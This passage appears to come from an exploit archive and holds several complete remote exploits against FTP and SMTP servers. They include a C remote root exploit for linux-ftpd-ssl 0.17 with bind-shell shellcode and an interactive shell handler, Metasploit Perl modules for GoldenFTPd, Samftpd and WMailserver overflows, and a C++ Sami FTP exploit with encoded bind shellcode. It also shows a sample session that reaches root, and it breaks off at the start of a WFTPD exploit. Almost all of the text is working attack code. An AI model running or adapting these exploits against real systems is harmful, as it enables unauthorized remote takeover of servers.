if (!($result=~/\d{3} User .+ okay, need password/))
{
$self->PrintLine(" Invalid user");
return;
}
$s->Send("PASS ".$pass);
$result = $s->Recv(-1, 20);
if (!($result=~/\d{3} User logged in/))
{
$self->PrintLine(" Invalid password");
return;
}
$s->Send("SITE ".$custom_site_cmd." | $cmd;");
$result = $s->Recv(-1, 20);
if (!($result=~/^200/))
{
$self->PrintLine(" Error: $result");
return;
}
$self->PrintLine('');
my @results = split ( /\n/, $result );
chomp @results;
for (my $i = 1; $i < @results -1; $i++){
$self->PrintLine("$results[$i]");
}
return;
}
1;
# [2005-11-04]
21 linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit
/*Oct2005 VER2*/
/************************************************** ********/
/** lnxFTPDssl_warez.c **/
/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/
/** for all of those who installed the ssl ready version **/
/** of linux-ftpd to be more "secure" **/
/** **/
/** be aware of the buffer overflows, **/
/** the code is strong cryto **/
/************************************************** ********/
/** thanx blackzero,revoguard,wY!,net_spy **/
/** Confidential. Keep Private! **/
/************************************************** ********/
/**
C:\Dokumente und Einstellungen\Administrator\Desktop>telnet 192.168.2.9 21
220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.
AUTH SSL
234 AUTH SSL OK.
;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpP ppPPPPPpPpPPPpP
C:\Dokumente und Einstellungen\Administrator\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password
lnxFTPDssl_warez.c
linux-ftpd-ssl 0.17 remote r00t exploit by kcope
connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK
+++ USING STACK ADDRESS 0xbfffcc03 +++
+++ USING STACK ADDRESS 0xbfffcc13 +++
+++ USING STACK ADDRESS 0xbfffcc23 +++
+++ USING STACK ADDRESS 0xbfffcc33 +++
+++ USING STACK ADDRESS 0xbfffcc43 +++
+++ USING STACK ADDRESS 0xbfffcc53 +++
+++ USING STACK ADDRESS 0xbfffcc63 +++
+++ USING STACK ADDRESS 0xbfffcc73 +++
+++ USING STACK ADDRESS 0xbfffcc83 +++
+++ USING STACK ADDRESS 0xbfffcc93 +++
+++ USING STACK ADDRESS 0xbfffcca3 +++
+++ USING STACK ADDRESS 0xbfffccb3 +++
+++ USING STACK ADDRESS 0xbfffccc3 +++
+++ USING STACK ADDRESS 0xbfffccd3 +++
+++ USING STACK ADDRESS 0xbfffcce3 +++
+++ USING STACK ADDRESS 0xbfffccf3 +++
+++ USING STACK ADDRESS 0xbfffcd03 +++
+++ USING STACK ADDRESS 0xbfffcd13 +++
+++ USING STACK ADDRESS 0xbfffcd23 +++
+++ USING STACK ADDRESS 0xbfffcd33 +++
+++ USING STACK ADDRESS 0xbfffcd43 +++
+++ USING STACK ADDRESS 0xbfffcd53 +++
+++ USING STACK ADDRESS 0xbfffcd63 +++
+++ USING STACK ADDRESS 0xbfffcd73 +++
+++ USING STACK ADDRESS 0xbfffcd83 +++
+++ USING STACK ADDRESS 0xbfffcd93 +++
+++ USING STACK ADDRESS 0xbfffcda3 +++
+++ USING STACK ADDRESS 0xbfffcdb3 +++
+++ USING STACK ADDRESS 0xbfffcdc3 +++
+++ USING STACK ADDRESS 0xbfffcdd3 +++
+++ USING STACK ADDRESS 0xbfffcde3 +++
+++ USING STACK ADDRESS 0xbfffcdf3 +++
+++ USING STACK ADDRESS 0xbfffce03 +++
+++ USING STACK ADDRESS 0xbfffce13 +++
+++ USING STACK ADDRESS 0xbfffce23 +++
+++ USING STACK ADDRESS 0xbfffce33 +++
+++ USING STACK ADDRESS 0xbfffce43 +++
+++ USING STACK ADDRESS 0xbfffce53 +++
+++ USING STACK ADDRESS 0xbfffce63 +++
+++ USING STACK ADDRESS 0xbfffce73 +++
+++ USING STACK ADDRESS 0xbfffce83 +++
+++ USING STACK ADDRESS 0xbfffce93 +++
+++ USING STACK ADDRESS 0xbfffcea3 +++
+++ USING STACK ADDRESS 0xbfffceb3 +++
+++ USING STACK ADDRESS 0xbfffcec3 +++
Let's get ready to rumble!
id
uid=0(root) gid=0(root) egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom
),25(floppy),29(audio),44(video),46(plugdev)
uname -a
Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
**/
// Tested on Linux 2.4.18-14 Redhat 8.0
// Linux 2.2.20-idepci Debian GNU 3.0
// Linux 2.4.27-2-386 Debian GNU 3.1
// CHECK VER3 FOR MORE SUPPORT!!!
// ***KEEP IT ULTRA PRIV8***
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>
#define BUF_SIZ 4096
#define PORT 21
#define BINDPORT 30464
#define STACK_START 0xbfffcc03
#define STACK_END 0xbffff4f0
/*my shellcode*/
/*setreuid,chroot break,
bind to port 30464, 0xff is double*/
unsigned char lnx_bind[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x70\x31\xC0\x31\xDB\x31\xC9"
"\xB0\x46\xCD\x80\x5E\x90\xB8\xBE"
"\xff\xff\xff\xff\xff\xff\xF7\xD0"
"\x89\x06\xB0\x27\x8D\x1E\xFE\xC5"
"\xB1\xED\xCD\x80\x31\xC0\x8D\x1E"
"\xB0\x3D\xCD\x80\x66\xB9\xff\xff"
"\x03\xBB\xD2\xD1\xD0\xff\xff\xF7"
"\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD"
"\x80\xE2\xEF\xB8\xD1\xff\xff\xff"
"\xff\xff\xff\xF7\xD0\x89\x06\xB0"
"\x3D\x8D\x1E\xCD\x80\x31\xC0\x31"
"\xDB\x89\xF1\xB0\x02\x89\x06\xB0"
"\x01\x89\x46\x04\xB0\x06\x89\x46"
"\x08\xB0\x66\x43\xCD\x80\x89\xF1"
"\x89\x06\xB0\x02\x66\x89\x46\x0C"
"\xEB\x04\xEB\x74\xEB\x77\xB0\x77"
"\x66\x89\x46\x0E\x8D\x46\x0C\x89"
"\x46\x04\x31\xC0\x89\x46\x10\xB0"
"\x10\x89\x46\x08\xB0\x66\x43\xCD"
"\x80\xB0\x01\x89\x46\x04\xB0\x66"
"\xB3\x04\xCD\x80\x31\xC0\x89\x46"
"\x04\x89\x46\x08\xB0\x66\xB3\x05"
"\xCD\x80\x88\xC3\xB0\x3F\x31\xC9"
"\xCD\x80\xB0\x3F\xB1\x01\xCD\x80"
"\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0"
"\x9D\x96\x91\xF7\xD0\x89\x06\xB8"
"\xD0\x8C\x97\xD0\xF7\xD0\x89\x46"
"\x04\x31\xC0\x88\x46\x07\x89\x76"
"\x08\x89\x46\x0C\xB0\x0B\x89\xF3"
"\x8D\x4E\x08\x8D\x56\x0C\xCD\x80"
"\xE8\x15\xff\xff\xff\xff\xff\xff";
long ficken() {
printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\n\n");
return 0xc0debabe;
}
void usage(char **argv) {
printf("Insufficient parameters given.\n");
printf("Usage: %s <remotehost> <user> <pass> [writeable directory]\n", argv[0]);
exit(0);
}
void _recv(int sock, char *buf) {
int bytes=recv(sock, buf, BUFSIZ, 0);
if (bytes < 0) {
perror("read() failed");
exit(1);
}
}
void attack(int sock, unsigned long ret, char *pad) {
int i,k;
char *x=(char*)malloc(1024);
char *bufm=(char*)malloc(1024);
char *bufc=(char*)malloc(1024);
char *rbuf=(char*)malloc(BUFSIZ+10);
char *nops=(char*)malloc(1024);
unsigned char a,b,c,d;
memset(nops,0,1024);
memset(nops,0x90,255);
memset(x,0,1024);
for (i=0,k=0;i<60;i++) {
a=(ret >> 24) & 0xff;
b=(ret >> 16) & 0xff;
c=(ret >> 8) & 0xff;
d=(ret) & 0xff;
if (d==255) {
x[k]=d;
x[++k]=255;
} else {
x[k]=d;
}
if (c==255) {
x[k+1]=c;
x[++k+1]=255;
} else {
x[k+1]=c;
}
if (b==255) {
x[k+2]=b;
x[++k+2]=255;
} else {
x[k+2]=b;
}
if (a==255) {
x[k+3]=a;
x[++k+3]=255;
} else {
x[k+3]=a;
}
k+=4;
}
snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1
snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x);
for (i=0; i<11; i++) {
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}
for (i=0; i<2; i++) {
snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind);
snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
snprintf(bufm, 1000, "MKD %s\r\n", nops);
snprintf(bufc, 1000, "CWD %s\r\n", nops);
send(sock, bufm, strlen(bufm), 0);
recv(sock, rbuf, BUFSIZ, 0);
send(sock, bufc, strlen(bufc), 0);
recv(sock, rbuf, BUFSIZ, 0);
}
send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0);
free(bufm);
free(bufc);
free(x);
free(rbuf);
}
int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}
int do_connect (char *remotehost, int port) {
struct hostent *host;
struct sockaddr_in addr;
int s;
if (!inet_aton(remotehost, &addr.sin_addr))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
if (port == PORT) perror("connect() failed");
return -1;
}
return s;
}
void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {
memset(buf, 0, sizeof(buf));
memset(sendbuf, 0, sizeof(sendbuf));
do {
_recv(s, buf);
} while (strstr(buf, "220 ") == NULL);
snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "331 ") == NULL);
snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass);
send(s, sendbuf, strlen(sendbuf), 0);
do {
_recv(s, buf);
} while (strstr(buf, "230 ") == NULL);
}
int main(int argc, char **argv) {
char remotehost[255];
char user[255];
char pass[255];
char pad[10];
char *buf,*sendbuf;
int stackaddr=STACK_START;
int s,sr00t,i;
ficken();
if (argc < 4)
usage(argv);
strncpy(remotehost, argv[1], sizeof(remotehost));
remotehost[sizeof(remotehost)-1]=0;
strncpy(user, argv[2], sizeof(user));
user[sizeof(user)-1]=0;
strncpy(pass, argv[3], sizeof(pass));
pass[sizeof(pass)-1]=0;
printf("connecting to %s:%d...", remotehost, PORT);
fflush(stdout);
s=do_connect(remotehost, PORT);
puts(" ok.");
buf=(char*)malloc(BUFSIZ+10);
sendbuf=(char*)malloc(BUFSIZ+10);
do_login(s, buf, sendbuf, user, pass);
if (strstr(buf, "230")!=NULL) {
printf("OK - STARTING ATTACK\n");
i=0;
while (stackaddr <= STACK_END) {
printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr);
sleep(1);
if (i==1) {
strcpy(pad, "A");
}
if (i==2) {
strcpy(pad, "AA");
}
if (i==3) {
strcpy(pad, "AAA");
i=0;
}
attack(s, stackaddr, pad);
close(s);
s=do_connect(remotehost, PORT);
do_login(s, buf, sendbuf, user, pass);
if (argv[4] != NULL) {
snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]);
send(s, sendbuf, strlen(sendbuf), 0);
recv(s, buf, BUFSIZ, 0);
}
if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {
/* XXX Remote r00t */
printf("\nLet's get ready to rumble!\n");
do_remote_shell(sr00t);
exit(0);
}
stackaddr+=16;
i++;
}
} else {
printf("\nLogin incorrect\n");
exit(1);
}
free(buf);
free(sendbuf);
return 0;
}
// [2005-11-05]
21 Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)
##
# Written by Tim Shelton [[email protected]]
# GoldenFTPd
##
package Msf::Exploit::goldenftpd_appe;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'GoldenFTPd APPE <= 1.92 Stack Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Tim Shelton <redsand [at] redsand.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'anonymous'],
'PASS' => [1, 'DATA', 'Password', 'metasploit@'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the GoldenFTPd
server. The flaw is triggered when a APPE command is received
with a specially crafted overly-long argument. This vulnerability
affects all versions of GoldenFTPd prior to 1.92 and was discovered by
Tim Shelton.
}),
'Refs' =>
[
['RED-NET', '2005-11-14-01'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['GoldenFTPd Server <= 1.92 Universal', 0x99998888, 0x11111111, 0x98d855eb, 0x0044395F],
],
'Keys' => ['goldenftp'],
'DisclosureDate' => 'NONE',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(30)) {
$self->PrintLine(" Failed to initialize the NOP module.");
return;
}
# my $shellcode = "\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe";
my $evil = ("APPE /");
$evil .= ("A/")x120;
$evil .= (pack("V",$target->[3])) x 4;
$evil .= (pack("V",$target->[1]) . pack("V",$target->[2]) . pack("V",$target->[4]) . pack("V", $target->[1]) ) x 4;
$evil .= $self->MakeNops(30);
$evil .= $shellcode;
$evil .= "\x0a\x0d";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
$self->PrintLine(sprintf (" Universal GoldenFTPd 1.93 Exploit by redsand\n"));
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf (" Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
my $r = $s->Recv(-1, 30);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
$self->PrintLine(" $r");
$self->PrintLine(" Login as " .$self->GetVar('USER'). "/" .$self->GetVar('PASS'));
$s->Send("USER ".$self->GetVar('USER')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->PrintLine(" Sending evil buffer....");
$s->Send($evil);
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print(" $r");
return;
}
# [2005-12-20]
21 Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (meta)
##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##
package Msf::Exploit::pmsoftware_samftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PMSoftware Samftpd Remote Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ '<redsand [at] blacksecurity.org>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'redsand0wnedj00'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
# 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the log handler of Samftpd
}),
'Refs' =>
[
['SA18574', 'secunia.com/advisories/SA18574'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['SamFtpd PmSoftware.exe WinXP SP0/1 Eng.', 0x71ab7bfb],
['SamFtpd PmSoftware.exe WinXP SP2 Eng.', 0x77daaccf],
],
'Keys' => ['samftpd'],
'DisclosureDate' => 'Jan 25 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $header = "\x81\xc4\xff\xef\xff\xff\x44";
if (! $self->InitNops(30)) {
$self->PrintLine(" Failed to initialize the NOP module.");
return;
}
my $evil = ("PASS ");
$evil .= "A"x219;
$evil .= pack("V", $target->[1]) x 5 ;
$evil .= "\x90\x90" x 5; # little bit of padding
$evil .= $shellcode;
$evil .= "\x0a\x0d";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
$self->PrintLine(sprintf (" PMSoftware Samftpd Remote Exploit by redsand\@blacksecurity.org"));
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
#$self->PrintLine(sprintf (" Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
my $r = $s->Recv(-1, 30);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
$self->PrintLine(" $r");
$self->PrintLine(" Login as " .$self->GetVar('USER'));
$s->Send("USER ".$self->GetVar('USER')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->PrintLine(" Sending evil buffer....");
$s->Send($evil);
#$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print(" $r");
return;
}
# [2006-01-25]
21 Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
// Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'
#pragma comment(lib, "ws2_32")
char MyShellCode[] = // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x 73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
"\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x 3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\x E7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\x AA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\x A9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x 95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x 98\x77\xF3\x93"
"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\x AD\x16\x71\x09"
"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x 18\x75\x09\x98"
"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\x CE\xDE\xCE\xDE"
"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x 99\x9A\x90\x10"
"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x 8D\xCE\xCF\xCA"
"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\x BD\xA8\x59\xF3"
"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\x DD\xBD\xA4\x10"
"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\x DD\xBD\x89\xCD"
"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\x C8\x66\xCC\xA9"
"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\x CE\x66\xCC\x95"
"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\x DC\xA5\x12\xCD"
"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x 7A\xAB\xD0\x12"
"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\x ED\x9E\x58\x56"
"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\x C3\xBD\x98\x72"
"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x 98\x71\x72\x9B"
"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";
static char PayLoad[1329];
int IP;
int Port;
int szNOP1, szNOP2;
int Nop;
// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = "\x0C\xED\xE3\x77";
// Flag ID server Sami FTP.
char TargetFlag[] = "220-\r\n220 Features p a .";
char RecvBuff[200];
void usage(){
cout<<" "<<endl;
cout<<"USAGE : ThisAppz [Target IP] [Port to connect FTP]" <<endl;
cout<<"If a port isnt specified, default port will 21." <<endl;
cout<<"Without IP, the Xploit run in local mode [127.0.0.1]"<<endl;
cout<<" "<<endl;
return;}
void Info(){
cout<<" "<<endl;
cout<<" ============================================== v1.0 =="<<endl;
cout<<" ====== Sami FTP Remote Buffer Overflow Exploit ======"<<endl;
cout<<" ================== Coded by HolyGhost ================"<<endl;
cout<<" ====== Distributed for educational purposes only ====="<<endl;
cout<<" ================== [email protected] ================"<<endl;
cout<<" ================================================== ===="<<endl;
cout<<" "<<endl;}
int main(int argc,char *argv[]){
Info();
if ( ( argc > 3 ) ){usage();return -1;}
if( argc > 1 ){
cout<<"argv[1]"<<"\t"<<argv[1]<<endl;
IP = htonl( inet_addr( argv[1] ) );}
else{
cout<<"Local test mode : 127.0.0.1"<<endl;
IP = htonl( inet_addr( "127.0.0.1" ) );}
if( argc == 3 ){
cout<<"argv[2]"<<"\t"<<argv[2]<<endl;
Port = atoi( argv[2] );}
else{
cout<<"Port by default : 21"<<endl;
Port = 21;}
WSADATA wsadata;
if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
cout<<"[-] WSAStartup error. Bye!"<<endl;
return -1;}
SOCKET sck;
fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.
if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );
timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );
switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
case -1:{ // Problem!
cout<<"[-] Select() error. Bye!"<<endl;
closesocket( sck );
return -1;}
case 0:{ // Problem!
cout<<"[-] Connect() error. Bye!"<<endl;
closesocket( sck );
return -1;}
default:
if(FD_ISSET( sck, &mask ) ){
recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID.
cout<<"[+] Connected, checking the server for flag..."<<endl;
Sleep( 500 );
if ( !strstr( RecvBuff, TargetFlag ) ){
cout<<"[-] This is not a valid flag from target! Bye."<<endl;
return -1;} // Bye!
cout<<RecvBuff;
Sleep( 1000 );
cout<<"[+] Connected, constructing the PayLoad..."<<endl;
szNOP1 = 219; // First padding.
szNOP2 = 720; // Second padding.
// Initialise le Buffer PayLoad NULL.
memset( PayLoad, NULL, sizeof( PayLoad ) );
strcat( PayLoad, "USER " ); // Command User.
// First padding.
for( Nop = 0; Nop < szNOP1; Nop++ ){
strcat( PayLoad, "\x90" );}
// New EIP register.
strcat( PayLoad, JmpESP );
// Second Padding.
for( Nop = 0; Nop < szNOP2; Nop++ ){
strcat( PayLoad, "\x90" );}
strcat( PayLoad, MyShellCode );
strcat( PayLoad, "\x0D\x0A" );
// Send fully PayLoad.
if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
cout<<"[-] Sending error, the server prolly rebooted."<<endl;
return -1;}
Sleep( 1000 );
cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
return 0;
}
}
closesocket( sck );
WSACleanup();
return 0; // Bye!
}
// Fully PayLoad description (1329 Bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n]
// 5 219 4 720 379 2
// [2006-01-31]
21 SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wmailserver_smtp;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
via a SEH frame overwrite.
}),
'Refs' =>
[
['CVE', 'CAN-2005-2287'],
['BID', '14213'],
],
'Targets' =>
[
['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
['Windows 2000 English ALL', 0x75022ac4],
['Windows XP English SP0/SP1', 0x71aa32ad],
],
'Keys' => ['smtp'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine(" Failed to initialize the nop module.");
return;
}
my $splat = Pex::Text::UpperCaseText(5117);
my $sploit =
" ". $splat. "\xeb\x06". pack('V', $target->[1]).
$shellcode. "\r\n\r\n";
$self->PrintLine(sprintf(" Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# [2006-02-01]
21 WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
